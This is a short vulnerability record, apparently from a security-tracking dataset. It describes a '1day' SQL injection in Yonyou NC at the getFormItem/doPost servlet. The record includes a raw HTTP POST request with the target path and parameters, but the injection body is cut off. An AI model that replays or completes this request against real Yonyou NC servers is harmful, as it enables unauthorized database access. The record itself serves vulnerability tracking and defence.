vendor = "用友"
name = "用友NC getFormItem doPost SQL注入"
type = "SQL注入"
version = "未知"
path = "/portal/pt/servlet/getFormItem/doPost"
detail = "POST /portal/pt/servlet/getFormItem/doPost?pageId=login&clazz=nc.uap.wfm.vo.base.ProDefBaseVO&proDefPk=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Length: 19"
fix = "未知"
date = "0709"
label = "1day"
verifier = "AdySec"
